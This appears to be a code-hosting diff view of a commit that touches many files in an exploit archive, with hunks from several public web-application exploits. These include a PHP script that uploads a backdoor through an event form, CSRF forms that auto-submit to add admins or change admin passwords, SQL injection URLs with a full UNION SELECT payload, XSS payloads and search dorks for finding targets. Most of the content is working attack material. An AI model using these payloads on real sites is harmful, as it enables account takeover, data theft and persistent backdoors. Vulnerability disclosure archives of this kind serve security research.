<td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
|
||||||
<tr>
|
<tr>
|
||||||
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
|
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
|
||||||
|
|
||||||
[/code]
|
[/code]
|
||||||
|
|
||||||
|
|
|
@ -103,7 +103,7 @@ $post_bd = array(
|
||||||
"description"=>"bla bla bla ,,,","cat"=> 1,
|
"description"=>"bla bla bla ,,,","cat"=> 1,
|
||||||
"day"=> 22,"month"=> 11,"year"=>2011,
|
"day"=> 22,"month"=> 11,"year"=>2011,
|
||||||
"picture"=>"@".realpath("dz.php"),
|
"picture"=>"@".realpath("dz.php"),
|
||||||
"submit"=>" Update Event ");
|
"submit"=>" Update Event ");
|
||||||
|
|
||||||
# post backdoor & check
|
# post backdoor & check
|
||||||
echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");
|
echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
# Exploit Title: Pixie v1.04 blog post CSRF
|
# Exploit Title: Pixie v1.04 blog post CSRF
|
||||||
# Google Dork: # Date: 11-Dec-2011
|
# Google Dork: # Date: 11-Dec-2011
|
||||||
# Author: hackme
|
# Author: hackme
|
||||||
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
|
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
|
||||||
# Version: 1.04# Tested on: Linux Ubuntu 10.10
|
# Version: 1.04# Tested on: Linux Ubuntu 10.10
|
||||||
# CVE :
|
# CVE :
|
||||||
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
|
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
|
||||||
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post
|
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post
|
||||||
[+] Post Method
|
[+] Post Method
|
||||||
[+] exploit:
|
[+] exploit:
|
||||||
|
|
||||||
|
|
|
@ -7,15 +7,15 @@
|
||||||
# http://www.tubeace.com
|
# http://www.tubeace.com
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
# Dork: "?viewStandard=0"
|
# Dork: "?viewStandard=0"
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
|
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
|
||||||
Maximiliano Soler
|
Maximiliano Soler
|
||||||
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
||||||
InyeXion
|
InyeXion
|
||||||
her0, r0dr1 y demas user de RemoteExecution
|
her0, r0dr1 y demas user de RemoteExecution
|
||||||
www.remoteexecution.info www.remoteexcution.com.ar
|
www.remoteexecution.info www.remoteexcution.com.ar
|
||||||
#RemoteExecution Hacking Group
|
#RemoteExecution Hacking Group
|
||||||
|
|
||||||
[PoC]
|
[PoC]
|
||||||
|
|
||||||
|
|
|
@ -11,7 +11,7 @@
|
||||||
|
|
||||||
<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
|
<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
|
||||||
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
|
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
|
||||||
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
|
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
|
||||||
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
|
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
|
||||||
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL
|
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL
|
||||||
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>
|
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>
|
||||||
|
|
|
@ -77,7 +77,7 @@ setTimeout('document.test.submit()',0);
|
||||||
<input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
|
<input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
|
||||||
</p>
|
</p>
|
||||||
<p><input type="submit" name="Change" value="Change" />
|
<p><input type="submit" name="Change" value="Change" />
|
||||||
</p>
|
</p>
|
||||||
</form>
|
</form>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
@ -113,7 +113,7 @@ Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
|
||||||
<!-- buttons start -->
|
<!-- buttons start -->
|
||||||
<table width="100%" cellpadding="5" border="0">
|
<table width="100%" cellpadding="5" border="0">
|
||||||
<tr>
|
<tr>
|
||||||
<td width="80"> </td>
|
<td width="80"> </td>
|
||||||
<td align="right">
|
<td align="right">
|
||||||
<input type="submit" name="Save" value="Save" style="width:80px;">
|
<input type="submit" name="Save" value="Save" style="width:80px;">
|
||||||
</td>
|
</td>
|
||||||
|
|
|
@ -7,23 +7,23 @@
|
||||||
# http://www.mediaxxxscript.com/
|
# http://www.mediaxxxscript.com/
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
# Dork: "Powered by MediaXxx Mobile"
|
# Dork: "Powered by MediaXxx Mobile"
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
|
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
|
||||||
Maximiliano Soler
|
Maximiliano Soler
|
||||||
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
||||||
InyeXion,ksha,zerial,
|
InyeXion,ksha,zerial,
|
||||||
her0, r0dr1 y demas user de RemoteExecution
|
her0, r0dr1 y demas user de RemoteExecution
|
||||||
wwwremoteexecution.info www.remoteexcution.com.ar
|
wwwremoteexecution.info www.remoteexcution.com.ar
|
||||||
#RemoteExecution Hacking Group
|
#RemoteExecution Hacking Group
|
||||||
|
|
||||||
[PoC]
|
[PoC]
|
||||||
|
|
||||||
http://localhost/mobile/search?query=[SQL Injection]
|
http://localhost/mobile/search?query=[SQL Injection]
|
||||||
|
|
||||||
|
|
||||||
[DEMO]
|
[DEMO]
|
||||||
|
|
||||||
http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
|
http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
|
||||||
|
|
||||||
-------------------------
|
-------------------------
|
||||||
|
|
|
@ -102,15 +102,15 @@ Content-Type: text/html
|
||||||
</tr> <tr><td>Comment:</td><td>
|
</tr> <tr><td>Comment:</td><td>
|
||||||
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
|
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
|
||||||
</td><td>Last IP:NONE<br></td>
|
</td><td>Last IP:NONE<br></td>
|
||||||
<tr><td> </td><td></td></tr>
|
<tr><td> </td><td></td></tr>
|
||||||
<tr><td> </td><td>
|
<tr><td> </td><td>
|
||||||
<input type="submit" name="action" class="bluebox" value="Update" />
|
<input type="submit" name="action" class="bluebox" value="Update" />
|
||||||
<input type="submit" name="action" class="bluebox" value="Delete"
|
<input type="submit" name="action" class="bluebox" value="Delete"
|
||||||
onClick="javascript:return confirm('Really DELETE this end-device record?')"
|
onClick="javascript:return confirm('Really DELETE this end-device record?')"
|
||||||
/>
|
/>
|
||||||
</td></tr>'<tr><td> </td><td></td></tr>
|
</td></tr>'<tr><td> </td><td></td></tr>
|
||||||
<tr><td> </td><td></td></tr>
|
<tr><td> </td><td></td></tr>
|
||||||
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
|
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
|
||||||
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
|
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
|
||||||
<tr><td>Classification:
|
<tr><td>Classification:
|
||||||
|
|
||||||
|
|
|
@ -18,11 +18,11 @@ Project CHAP Security
|
||||||
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
|
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
|
||||||
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
||||||
InyeXion, ksha, zerial,LinuxFer, Scorp
|
InyeXion, ksha, zerial,LinuxFer, Scorp
|
||||||
her0, r0dr1 y demas user de RemoteExecution
|
her0, r0dr1 y demas user de RemoteExecution
|
||||||
www.remoteexecution.info www.remoteexcution.com.ar
|
www.remoteexecution.info www.remoteexcution.com.ar
|
||||||
#RemoteExecution Hacking Group
|
#RemoteExecution Hacking Group
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
[PoC]
|
[PoC]
|
||||||
|
|
||||||
http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
|
http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
|
||||||
|
|
|
@ -8,15 +8,15 @@ Date: 23/07/2012
|
||||||
# www.chap.cl
|
# www.chap.cl
|
||||||
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
|
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
|
||||||
# be secured /stay secure
|
# be secured /stay secure
|
||||||
# contacto@chap.cl
|
# contacto@chap.cl
|
||||||
|
|
||||||
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
|
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
|
||||||
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
|
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
|
||||||
www.remoteexecution.info www.remoteexcution.com.ar
|
www.remoteexecution.info www.remoteexcution.com.ar
|
||||||
#RemoteExecution Hacking Group
|
#RemoteExecution Hacking Group
|
||||||
|
|
||||||
[PoC]
|
[PoC]
|
||||||
find Squid's access.log file path and insert "> Example: ">PWNED!
|
find Squid's access.log file path and insert "> Example: ">PWNED!
|
||||||
|
|
||||||
http://server/mysar/www/?a=administration
|
http://server/mysar/www/?a=administration
|
||||||
|
|
||||||
|
|
|
@ -9,5 +9,5 @@
|
||||||
|
|
||||||
<form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
|
<form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
|
||||||
<input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
|
<input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
|
||||||
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
|
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
|
||||||
<input type="submit" value="Save"></td></tr></table></form></div>
|
<input type="submit" value="Save"></td></tr></table></form></div>
|
|
@ -39,14 +39,14 @@ Vulnerable page : http://target.com/[path]/admin/file_io.php
|
||||||
<td width="300" height="50" align="center" valign="middle">
|
<td width="300" height="50" align="center" valign="middle">
|
||||||
<font color="#808080">New Username:</font>
|
<font color="#808080">New Username:</font>
|
||||||
</td>
|
</td>
|
||||||
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
|
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
<tr>
|
<tr>
|
||||||
<td width="300" height="62" align="center" valign="middle">
|
<td width="300" height="62" align="center" valign="middle">
|
||||||
<font color="#808080">New Password: </font> </td>
|
<font color="#808080">New Password: </font> </td>
|
||||||
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
|
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td height="50" colspan="2" align="center" valign="middle" ><p>
|
<td height="50" colspan="2" align="center" valign="middle" ><p>
|
||||||
|
|
|
@ -77,7 +77,7 @@ type="password" value="abdotv"/></td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
||||||
<tr>
|
<tr>
|
||||||
<td valign="top"> </td>
|
<td valign="top"> </td>
|
||||||
<td><table border="0" cellspacing="0"
|
<td><table border="0" cellspacing="0"
|
||||||
cellpadding="2">
|
cellpadding="2">
|
||||||
<tr>
|
<tr>
|
||||||
|
@ -86,7 +86,7 @@ cellpadding="2">
|
||||||
<input type="submit"
|
<input type="submit"
|
||||||
value="Submit" name="btn_submit" >
|
value="Submit" name="btn_submit" >
|
||||||
</td>
|
</td>
|
||||||
<td width="6"> </td>
|
<td width="6"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
</table></td>
|
</table></td>
|
||||||
</tr>
|
</tr>
|
||||||
|
@ -109,7 +109,7 @@ value="Submit" name="btn_submit" >
|
||||||
<td width="3%" align="left" background="images/layoutadmin_109.jpg"
|
<td width="3%" align="left" background="images/layoutadmin_109.jpg"
|
||||||
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
|
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
|
||||||
width="33" height="20" alt="" /></td>
|
width="33" height="20" alt="" /></td>
|
||||||
<td background="images/layoutadmin_109.jpg"> </td>
|
<td background="images/layoutadmin_109.jpg"> </td>
|
||||||
<td width="3%" align="right"
|
<td width="3%" align="right"
|
||||||
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
|
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
|
||||||
><img src="images/layoutadmin_111.jpg" width="33" height="20" alt=""/></td>
|
><img src="images/layoutadmin_111.jpg" width="33" height="20" alt=""/></td>
|
||||||
|
|
|
@ -59,9 +59,9 @@ Error: You have an error in your SQL syntax; check the manual that corresponds t
|
||||||
AND `glpi_tickets`.`is_deleted` = 0
|
AND `glpi_tickets`.`is_deleted` = 0
|
||||||
' at line 3
|
' at line 3
|
||||||
Backtrace :
|
Backtrace :
|
||||||
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
|
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
|
||||||
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
|
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
|
||||||
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
|
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
|
||||||
/var/www/html/glpi/ajax/ticketassigninformation.php
|
/var/www/html/glpi/ajax/ticketassigninformation.php
|
||||||
|
|
||||||
|
|
||||||
|
@ -98,11 +98,11 @@ WHERE `ext` LIKE \'1\'\'
|
||||||
AND `is_uploadable`=\'1\'
|
AND `is_uploadable`=\'1\'
|
||||||
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
|
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
|
||||||
Backtrace :
|
Backtrace :
|
||||||
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
|
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
|
||||||
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
|
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
|
||||||
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
|
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
|
||||||
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
|
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
|
||||||
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
|
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
|
||||||
/var/www/html/glpi/front/document.form.php
|
/var/www/html/glpi/front/document.form.php
|
||||||
|
|
||||||
|
|
||||||
|
@ -121,9 +121,9 @@ Backtrace :
|
||||||
SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
|
SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
|
||||||
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
|
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
|
||||||
Backtrace :
|
Backtrace :
|
||||||
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
|
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
|
||||||
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
|
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
|
||||||
/var/www/html/glpi/ajax/comments.php :47 TableExists()
|
/var/www/html/glpi/ajax/comments.php :47 TableExists()
|
||||||
/var/www/html/glpi/ajax/comments.php
|
/var/www/html/glpi/ajax/comments.php
|
||||||
|
|
||||||
======================================================================
|
======================================================================
|
||||||
|
|
|
@ -1,9 +1,9 @@
|
||||||
source: https://www.securityfocus.com/bid/20202/info
|
source: https://www.securityfocus.com/bid/20202/info
|
||||||
|
|
||||||
BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
||||||
|
|
||||||
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
|
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
BirdBlog 1.4.0 and prior versions are reported vulnerable.
|
BirdBlog 1.4.0 and prior versions are reported vulnerable.
|
||||||
|
|
||||||
http://www.example.com/[path]/index.php?page=<Script>
|
http://www.example.com/[path]/index.php?page=<Script>
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue